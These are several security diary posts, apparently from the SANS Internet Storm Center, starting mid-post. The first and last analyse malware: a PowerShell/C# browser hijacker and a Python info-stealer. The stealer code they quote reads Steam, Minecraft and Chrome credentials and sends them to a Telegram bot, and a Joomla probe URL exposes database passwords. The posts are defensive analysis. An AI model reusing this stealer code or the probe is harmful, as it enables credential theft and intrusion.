/R:"C:\Windows\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll" 
/R:"C:\Windows\assembly\GAC_MSIL\WindowsBase\3.0.0.0__31bf3856ad364e35\WindowsBase.dll" 
/out:"C:\Users\user01\AppData\Local\Temp\z2fptyrq.dll" 
/D:DEBUG /debug+ /optimize- "C:\Users\user01\AppData\Local\Temp\z2fptyrq.0.cs”

Here is the PowerShell code:

1: $id = get-random
2: $assemblies = ("System.Web", "Microsoft.CSharp", "PresentationCore", "WindowsBase")
3: $code = @" ... "@
4: Add-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp -IgnoreWarnings
5: $fr = "[Application.Program$id]::run";
6: $fs = "[Application.Program$id]::stop";

More runtime parameters are obfuscated in an XOR’d string:

1: $eb=[System.Convert]::FromBase64String("RUVwSTMeZxMhQSooFRZQICsELE ... MqNRU7UmsgCCwTahFSFA==");
2: $k=$eb[0..4];
3: $bs=$eb[5..$eb.length];
4: $rs=@();
5: $j=0;
6: [array]::Resize([ref]$rs,$bs.length);
7: foreach($b in $bs) {$rs[$j++]=($b -bxor $k[$j%$k.length])}
8: $ja=$a.GetString($rs) | ConvertFrom-Json;

The XOR key is based on the 4-first bytes of the "$eb" variable. Here is the content of "$ja":

 1: PS C:\Users\REM> $ja
 2: chrome_center
 3: background.js
 4: temp.zip
 5: rtowatchship.xyz
 6: name='chrome.exe'
 7: load-extension
 8: chrome
 9: C:\Program Files\
10: C:\Program Files (x86)\
11: Google\Chrome\Application\chrome.exe
12: opera
13: name='opera.exe'
14: Opera\launcher.exe
15: \Programs\
16: taskkill /F /IM opera.exe /T

It was impossible to detonate the complete script in my sandbox (and compile the CSHARP code)… However, the code discloses interesting behaviors:

 1: public static void run(string domain, string uid, string ist, string tid)
 2: {
 3:    if (thread != null && thread.IsAlive)
 4:    {
 5:        return;
 6:    }
 7:    isRun = true;
 8:    srvUrl = String.Format("https://goog.{0}/?tid={1}&u={2}&agec={3}", domain, tid, uid, ist);
 9:    thread = new Thread(new ThreadStart(Program88.runThread));
10:    thread.IsBackground = true;
11:    thread.SetApartmentState(ApartmentState.STA);
12:    thread.Start();
13: }

The domain comes from the XOR-encoded data above: rtowatchship[.]xyz. A browser is started and, at the end of the function laughing it, there is a reference to this function:

hookSearchNavigation(hwnd, valuePattern, searchKeyword, true, referrer)

Microsoft UI Automation is a tool that provides an abstracted model of the UI, and allows a client application to both investigate and manipulate the UI of all running applications on the system.

[Update] I was able to detonate the last piece of PowerShell script in my sandbox after some code cleanup, but there is no data returned by rtowatchship[.]xyz.I don't have lot of experience with UI Automation. If you can share some details about the CSharp code, please share with us!

[1] https://for610.com
[2] https://bazaar.abuse.ch/sample/81e4e91b8a841311b28b42951d53ec6ce471227480ca97c91c2aa1eeda6dad30/
[3] https://learn.microsoft.com/en-us/windows/win32/api/uiautomationclient/nn-uiautomationclient-iuiautomation

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Grep is a command line tool I use every single day.  Not much to it, I use:

-i for case insensitive searches
-v to search for "not that thing"
quotes or "\" characters to excape out special characters
the "|" character ("this | that") to search for "this or that"

Not much else to know right?

I was searching Windows DNS Server logs (the text ones) the other day (and what a JOY those are!) - we were putting an ACL on a printer VLAN and noticed that one HP printer was making DNS requests, then opening a cleartext HTTP session to random AWS IP addresses.  OSINT didn't give me great intel on what those hosts were, so spelunking we did go in the DNS logs to see what this was all about!

Great, so let's find the IP's in the file:

C:\dnslogfiles\t>type dc5dns.txt | grep 3.217.159.189
      DATA   3.217.159.189
      DATA   3.217.159.189
      DATA   3.217.159.189
      DATA   3.217.159.189
      DATA   3.217.159.189
      DATA   3.217.159.189
.. and so on.

Not so useful, I said (OK, I added a few other words when I saw the output).  What I really need is that line of "foudn text", plus maybe ~20 lines before and after that text to see more of the DNS query and answer.  I was resigned to writing something that would do that, but then I though - surely I'm not the only person who needed "the text lines around the search text" - maybe it's built into grep?

After a quick "man grep", I found that indeed I was not the first person to wish for that.  From "man grep":
       -A NUM, --after-context=NUM
              Print NUM lines of trailing context after  matching  lines.
              Places a line containing a group separator (described under
              --group-separator) between contiguous  groups  of  matches.
              With  the  -o or --only-matching option, this has no effect
              and a warning is given.

       -B NUM, --before-context=NUM
              Print NUM lines of leading context before  matching  lines.
              Places a line containing a group separator (described under
              --group-separator) between contiguous  groups  of  matches.
              With  the  -o or --only-matching option, this has no effect
              and a warning is given.

Awesome!!  Here I thought this would be a story about some cool code or a sed script that I had to write, but what I'm looking for is already in grep!!

Looking closer at the file, what I wanted was the "found text", with 2 lines before and ~50 lines or so after

C:\dnslogfiles\t>type dc5dns.txt | grep -A 50 -B 37 3.217.159.189 | more

2/23/2023 5:13:14 PM 0C1C PACKET  00000005D8F8BC40 UDP Rcv 205.251.196.95  0747 R Q [2084 A     NOERROR] A      (39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws(3)com(0)
UDP response info at 00000005D8F8BC40
  Socket = 11312
  Remote addr 205.251.196.95, port 53
  Time Query=3087729, Queued=0, Expire=0
  Buf length = 0x0fa0 (4000)
  Msg length = 0x0129 (297)
  Message:
    XID       0x0747
    Flags     0x8420
      QR        1 (RESPONSE)
      OPCODE    0 (QUERY)
      AA        1
      TC        0
      RD        0
      RA        0
      Z         0
      CD        0
      AD        1
      RCODE     0 (NOERROR)
    QCOUNT    1
    ACOUNT    4
    NSCOUNT   4
    ARCOUNT   1
    QUESTION SECTION:
    Offset = 0x000c, RR count = 0
    Name      "(39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      QTYPE   A (1)
      QCLASS  1
    ANSWER SECTION:
    Offset = 0x0055, RR count = 0
    Name      "[C00C](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    60
      DLEN   4
      DATA   3.217.159.189
    Offset = 0x0065, RR count = 1
    Name      "[C00C](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    60
      DLEN   4
      DATA   34.204.229.165
    Offset = 0x0075, RR count = 2
    Name      "[C00C](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    60
      DLEN   4
      DATA   34.234.159.190
    Offset = 0x0085, RR count = 3
    Name      "[C00C](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    60
      DLEN   4
      DATA   54.175.201.22
    AUTHORITY SECTION:
    Offset = 0x0095, RR count = 0
    Name      "[C034](9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   NS  (2)
      CLASS  1
      TTL    1800
      DLEN   23
      DATA   (7)ns-1119(9)awsdns-11(3)org(0)
    Offset = 0x00b8, RR count = 1
    Name      "[C034](9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   NS  (2)
      CLASS  1
      TTL    1800
      DLEN   25
      DATA   (7)ns-1793(9)awsdns-32(2)co(2)uk(0)
    Offset = 0x00dd, RR count = 2
    Name      "[C034](9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   NS  (2)
      CLASS  1
      TTL    1800
      DLEN   19
      DATA   (6)ns-235(9)awsdns-29[C04C](3)com(0)
    Offset = 0x00fc, RR count = 3
    Name      "[C034](9)us-east-1(3)elb(9)amazonaws(3)com(0)"
      TYPE   NS  (2)
      CLASS  1
      TTL    1800
      DLEN   22
      DATA   (6)ns-934(9)awsdns-52(3)net(0)
--
  Msg length = 0x00bd (189)
  Message:
    XID       0x0a56
    Flags     0x8180
      QR        1 (RESPONSE)
      OPCODE    0 (QUERY)
      AA        0
      TC        0
      RD        1
      RA        1
      Z         0
      CD        0
      AD        0
      RCODE     0 (NOERROR)
    QCOUNT    1
    ACOUNT    5
    NSCOUNT   0
    ARCOUNT   0
    QUESTION SECTION:
    Offset = 0x000c, RR count = 0
    Name      "(6)signal(4)pod4(6)avatar(3)ext(2)hp(3)com(0)"
      QTYPE   A (1)
      QCLASS  1
    ANSWER SECTION:
    Offset = 0x002f, RR count = 0
    Name      "[C00C](6)signal(4)pod4(6)avatar(3)ext(2)hp(3)com(0)"
      TYPE   CNAME  (5)
      CLASS  1
      TTL    3499
      DLEN   66
      DATA   (39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws[C026](3)com(0)
    Offset = 0x007d, RR count = 1
    Name      "[C03B](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws[C026](3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    59
      DLEN   4
      DATA   3.217.159.189
    Offset = 0x008d, RR count = 2
    Name      "[C03B](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws[C026](3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    59
      DLEN   4
      DATA   34.204.229.165
    Offset = 0x009d, RR count = 3
    Name      "[C03B](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws[C026](3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    59
      DLEN   4
      DATA   34.234.159.190
    Offset = 0x00ad, RR count = 4
    Name      "[C03B](39)prod-pod4-dvc-signaling-podlb-218071557(9)us-east-1(3)elb(9)amazonaws[C026](3)com(0)"
      TYPE   A  (1)
      CLASS  1
      TTL    59
      DLEN   4
      DATA   54.175.201.22
    AUTHORITY SECTION:
      empty
    ADDITIONAL SECTION:
      empty

Look in the "Question" section, the printer is making a request for an A record for the FQDN "signal.pod4.avatar.ext.hp.com"
The "answer" session shows that this is a CNAME pointed to a bunch of Amazon addresses.  So HP printer / HP hostname, this was looking a lot less suspicious than when we started.

What did this end up being?  The client has left some of the "web print" features on, where you can print to an internet service and your printer will pick it up and print it.  Not the greatest idea for a corporation, we've since turned those features off.

Got a weird function in a common command that you found in the help or man text?  Please, share something about it in our comment section! RTFM is great advice, but it's seldom taken!  (not by me anyway :-)  )

===============
Rob VandenBrink
rob@coherentsecurity.com

About three weeks ago, Joomla fixed a vulnerability in the Joomla content management system, patching a trivial to exploit access control vulnerability. The vulnerability allowed access to the Joomla username/password database.

The patch deployed to mitigate the issue tells us a bit about what happened:

ApiRouter.php:
// Remove the public key as it is only supported coming from the route definition
if (array_key_exists('public', $query)) {
    unset($query['public']);
}

Later the "public" parameter would have been used to bypass authentication:

ApiApplication.php
if (!isset($route['vars']['public']) || $route['vars']['public'] === false) {
   if (!$this->login(['username' => ''], ['silent' => true, 'action' => 'core.login.api'])) {
        throw new AuthenticationFailed();
   }
}

A typical URL used to probe the vulnerability is:

/api/index.php/v1/config/application?public=true

This URL, if vulnerable, returns database configuration data, including the username and password. Exploits for this vulnerability were made public pretty much the day the vulnerability became public.

In line with the availability of a simple exploit, we also saw the exploitation of the vulnerability in our honeypots. But these last couple of days, one source IP, in particular, started to scan for this vulnerability rather aggressively:

(see the data here)

The attacker, %%ip:95.214.27.107%% appears to be scanning exclusively for this vulnerability and has had no reports in our database before the last two days. It does not appear to be associated with a known research group or botnet. The website returned by the attacking system is a default Plesk page, which may indicate a compromised, unmaintained system. It has now, however, been added to a few different blocklists.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

[David Boyd, a SANS.edu undergraduate intern, submitted this post]

Have you ever considered that a VSCode extension you rely on could also be the very tool that puts your sensitive data in the hands of attackers? As fellow developers, we often can be seen when using the popular open-source platform Visual Studio Code (VSCode)--and even if you do not, you will know someone who does.

On February 19, 2023, an attempted exploit was identified in my DShield's honeypot weblogs. The attack targeted a security vulnerability in the VSCode-SFTP extension, which allows users to synchronize a local directory with a remote server via the web request: /.vscode/sftp.json.

OWASP identifies this vulnerability under the A07:2021 – Identification and Authentication Failures category (previously known as Broken Authentication), and if exploited, it could allow attackers to access sensitive data such as usernames, passwords, and remote hosts.

The VSCode-SFTP extension setup is simple, requiring only a few lines of code in its sftp.json configuration file. These few lines can apply a wide range of settings. One such line is the password parameter. While optional, many users leave it unprotected, making it susceptible to attacks. Thus, the vulnerability results from the default permissions in this configuration file being left open to the public, saved in plain text, or containing hard-coded authentication credentials.

It is crucial to protect our SFTP credentials, as having them publicly accessible could pose significant dangers to our security. One of the major risks is unauthorized access, where anyone can use the credentials to gain access to our data, resulting in data breaches or theft of sensitive information. Another risk is malware attacks, where hackers can upload malicious code onto our server, causing potential data loss, downtime, or other disruptions. This can damage our reputation and erode customer trust. In addition, it can also result in compliance violations depending on the industry.
If you are a developer using this extension, we must ensure that our SFTP credentials are kept confidential and accessible only to authorized personnel, using strong passwords, two-factor authentication, encryption, and regularly auditing and monitoring access to SFTP servers. This will prevent sensitive information from being publicly accessible. If these mitigations are not plausible, you may need to consider removing the VSCode-SFTP extension entirely from production.

But who was behind this attack? Interestingly, the IP address %%ip:138.68.154.197%% associated with the attempted exploit traces back to LeakIX, a public scanner that combines a search engine indexing public information and open reporting platform. LeakIX helps identify vulnerabilities in internet-facing technologies by following a 30-day disclosure policy to hosting companies before publishing the leak to the public. While the HTTP requests' user agent string of Go-http-client/1.1 does not contain any information identifying the client or device used to make the request explicitly, it can be confirmed that the requester was from the LeakIX’s Client scanner. According to their GitHub page, the scanner uses the Go programming language's net/http library to create their custom HTTP client.

Despite the relief that this was not a malicious attacker, but an ethical scanner, this attack serves as a warning to take the necessary precautions to secure your sensitive data. It illustrates that even with secure protocols like SFTP, if communication credentials become publicly available, then the security of the protocol could be rendered useless. It also highlights the risks associated with leaving default file permissions open to the public and the importance of securing sensitive configuration files.

Sources
LeakIX: https://leakix.net/
LeakIXClient: https://github.com/LeakIX/LeakIXClient

We frequently see news of information leaks that occur in different companies due to having information in the cloud with the wrong permissions, allowing anyone access to potentially confidential information.

Why do people remove restrictions and allow a bucket to be public? Regardless of its intention, on many occasions it corresponds to inappropriate devops practices where objects are created from development without security measures and make their transition to production in the same way.

In this diary we will look at how to scan S3 buckets on AWS with incorrect public access permissions. For this we will use the s3scanner tool, which you can get from https://github.com/sa7mon/S3Scanner It requires the creation of a file containing the names of all buckets to be enumerated. For this case, I proceeded to create a bucket with a hackable name and it will be the only name that contains the file:

After this, we proceed with the execution of the tool. It is important to note that we are doing an enumeration exercise that does not involve configuring AWS credentials, which is why we will get a warning that still does not interfere with the result we seek to obtain:

Let's see what files are present using AWS Cli:

And, of course, AWS console shows a mayor warning as publicly accesible with this bucket:

Changing permissions on cloud artifacts can easily go unnoticed. To manage problems like these, it is necessary to have a control that performs the automated review of the security posture in the cloud, in such a way that it alerts when this kind of permission change occurs and thus the corresponding actions can be taken. We will review this in a future diary.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Mastodon:manuelsantander@infosec.exchange
email:msantand@isc.sans.org

A friend and colleague of mine, @DhaeyerWolf, asked me for a bit of help with the design of a YARA rule.

It’s to detect OneNote files with embedded files, that are not images.
He has strings to detected any embedded file, and strings to detect embedded PNG files, JPEG files, ...

So, in YARA, how can you use this to detect OneNote files that contain embedded files, but are not images? The trick is to count and compare string occurrences.

Take this YARA string:

$FileDataStoreObjectGUID =  { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC }

If we want to count the number of occurrences of string $FileDataStoreObjectGUID inside a file, we use this expression: #FileDataStoreObjectGUID (# is the operator to count occurences of a string).

A condition might then be:

condition: #FileDataStoreObjectGUID > 2

A rule with this condition will trigger if there are more than 2 occurrences of string $FileDataStoreObjectGUID inside a file (and by extension, more than 2 embedded files inside that file).

This string detects embedded PNG files:

$FileDataStoreObjectGUIDPNG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4E 47 0D 0A 1A 0A }

To write a rule that detects OneNote files with embedded files that are not PNG files, we can do the following:

rule onenote_suspicious {
    strings:
        $FileDataStoreObjectGUID =  { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC }
        $FileDataStoreObjectGUIDPNG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4E 47 0D 0A 1A 0A }
    condition: #FileDataStoreObjectGUID > #FileDataStoreObjectGUIDPNG
}

This rule triggers if we have more embedded files overall than embedded files that are PNG files. If that’s the case, then we have embedded files that are not PNG files. And these are suspicious to us.

Of course, other image types might be present, and these have been accounted for by my colleague in his blog post.

This method works because all embedded files are prefixed by a data structure (FileDataStoreObject) that starts with a unique GUID. Thus we just have to make strings to count all embedded files and strings for all embedded file types we consider to be benign. If there is a difference between these 2 counts, then we trigger an alert.
Best case: the rule triggers on malicious embedded files.
Worst case: the rule triggers on benign embedded files of a type we did not know about or did not expect.

This generic method works as long as it is easy to count generic objects (e.g., any embedded file) and specific objects (e.g., embedded images): then you just have to compare counters.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

They are a lot of “gamers” on the Internet. They generate a lot of business around games. Many of them can be downloaded for free, but they have online shops to buy options like extra lives, weapons, suits, packages, etc. Therefore, the business of gaming is very lucrative today[1].

I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“Произошёл запуск” can be translated to "a new connection has been established”).

Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:

bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)

The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.

First, Chrome data is inspected, and only interesting domains are searched:

target_domain = [
    "minecraft.net", 
    "google.com", 
    "live.com", 
    "apple.com", 
    "twitter.com", 
    "spotify.com", 
    "discord.com", 
    "discord.gg", 
    "blockchain.com", 
    "coinbase.com", 
    "paypal.com", 
    "mojang.com", 
    "steamcommunity.com", 
    "steampowered.com", 
    "origin.com", 
    "ea.com", 
    "ubisoft.com"
]

Then, the script searches for the presence of Minecraft:

if os.path.isdir(apps["Minecraft"]):
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
    try:
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:
        pass

Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:

try:
    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
    steam_config = steampath + "/config/config.vdf"
    steam_users = steampath + "/config/loginusers.vdf"
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:
            steam_ssfn.append(filename)
    steam_installed = True

except FileNotFoundError:
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False

send_to_users = [1084445274]

for user in send_to_users:
    bot.send_message(user, f"Произошёл запуск `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name:  `{socket.gethostname()}`\n??User:  `{os.getlogin()}`\n?OC:  `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed == True:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        for filename in steam_ssfn:
            with open(f"{steampath}/{filename}", "rb") as file:
                bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")
                file.close()

They also search for Outline Manager instances:

if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"
    with open(AccountsPath, mode="r") as file:
        for string in file.read().splitlines():
            if "accessKey" in string:
                key = string
    reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
    key = reg.sub('', key)

    for user in send_to_users:
        bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")

Nothing brand new with this sample except it targets gamers. Money is involved with games (sometimes a lot), so they are nice targets for attackers. Stay safe!

[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key